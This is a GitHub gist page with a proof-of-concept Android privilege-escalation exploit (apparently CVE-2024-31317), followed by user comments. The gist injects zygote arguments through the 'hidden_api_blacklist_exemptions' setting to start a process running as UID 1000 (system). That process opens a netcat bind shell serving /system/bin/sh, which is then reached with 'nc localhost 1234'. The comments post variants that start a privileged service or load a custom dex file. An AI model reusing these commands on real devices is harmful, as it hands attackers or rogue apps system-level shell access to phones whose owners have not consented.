-
-
Save ybtag/db3f3595139556c773fb94b7cbe668b5 to your computer and use it in GitHub Desktop.
| am force-stop com.android.settings | |
| settings put global hidden_api_blacklist_exemptions "LClass1;->method1( | |
| 15 | |
| --runtime-args | |
| --setuid=1000 | |
| --setgid=1000 | |
| --runtime-flags=2049 | |
| --mount-external-full | |
| --target-sdk-version=29 | |
| --setgroups=3003 | |
| --nice-name=runnetcat | |
| --seinfo=platform:su:targetSdkVersion=29:complete | |
| --invoke-with | |
| toybox nc -s 127.0.0.1 -p 1234 -L /system/bin/sh -l; | |
| --instruction-set=arm | |
| --app-data-dir=/data/ | |
| --package-name=com.android.settings | |
| android.app.ActivityThread | |
| " | |
| am start -a android.settings.SETTINGS | |
| nc localhost 1234 |
@Bonveio were u able to achieve something like this https://gist.github.com/ybtag/db3f3595139556c773fb94b7cbe668b5?permalink_comment_id=5535933#gistcomment-5535933?
from what i understand to the PoC, its impossible to initialize the exploit without the UID 2000 (shell user) which you can only achieve externally using adb (if the device is not rooted, if it is rooted i think you can run adbd on a superuser shell). but the running netcat shell server with UID 1000 privilege listening on 0.0.0.0 is accessible by any android apps on the device like Termux. Just be careful to remove the hidden_api_blacklist_exemptions before rebooting/restarting the device or else the device will occur in bootloop
@Bonveio yes we have to execute this exploit with shell access (UID:2000) which there are ways that I'm aware how to achieve. My main question is even though if I run this netcat with system privileges I am not able to utilize it's benefits such as calling privileged methods during runtime etc. via my custom application. I think there are ways to get back n forth communication using this exploit but I am not able to figure out.
@Bonveio yes we have to execute this exploit with shell access (UID:2000) which there are ways that I'm aware how to achieve. My main question is even though if I run this netcat with system privileges I am not able to utilize it's benefits such as calling privileged methods during runtime etc. via my custom application. I think there are ways to get back n forth communication using this exploit but I am not able to figure out.
This is way beyond my knowledge im sorry i might not be able to help you with that matter, but im happy if i can test the custom application you're trying to build so i can report or suggest something that might be helpful on your development
For example if I do something like this
settings put global hidden_api_blacklist_exemptions "LClass1;->method1(
15
--runtime-args
--setuid=1000
--setgid=1000
--runtime-flags=2049
--mount-external-full
--target-sdk-version=29
--setgroups=3003
--nice-name=runnetcat
--seinfo=platform:su:targetSdkVersion=29:complete
--invoke-with
am start-foreground-service -n com.user.helloworld/.PrivilegedService;
--instruction-set=arm
--app-data-dir=/data/
--package-name=com.android.settings
android.app.ActivityThread
"
Then Settings app crashes on opening and this command am start-foreground-service -n com.user.helloworld/.PrivilegedService; present in --invoke-with doesnt get invoked properly
Following this - https://blog.flanker017.me/cve-2024-31317/
I tried to do something like this
settings put global hidden_api_blacklist_exemptions "LClass1;->method1(
18
--runtime-args
--setuid=1000
--setgid=1000
--runtime-flags=2049
--mount-external-full
--target-sdk-version=29
--setgroups=3003
--nice-name=hello_world_zygote
--seinfo=platform:system_app:targetSdkVersion=29:complete
--instruction-set=arm
--app-data-dir=/data/
--package-name=com.android.settings
com.android.internal.os.WrapperInit
0
29
-cp
/data/local/tmp/classes.dex
com.test.user.helloworld.WrapperCustom
"
But it is throwing Already Cached excpetion
java.lang.IllegalStateException: Already cached. at android.app.ApplicationLoaders.createAndCacheNonBootclasspathSystemClassLoaders(ApplicationLoaders.java:148) at com.android.internal.os.ZygoteInit.cacheNonBootClasspathClassLoaders(ZygoteInit.java:374) at com.android.internal.os.ZygoteInit.preload(ZygoteInit.java:144) at com.android.internal.os.WrapperInit.main(WrapperInit.java:83) at java.lang.reflect.Method.invoke(Native Method) at com.android.internal.os.RuntimeInit$MethodAndArgsCaller.run(RuntimeInit.java:492) at com.android.internal.os.ZygoteInit.main(ZygoteInit.java:930)
@Bonveio were u able to achieve something like this https://gist.github.com/ybtag/db3f3595139556c773fb94b7cbe668b5?permalink_comment_id=5535933#gistcomment-5535933?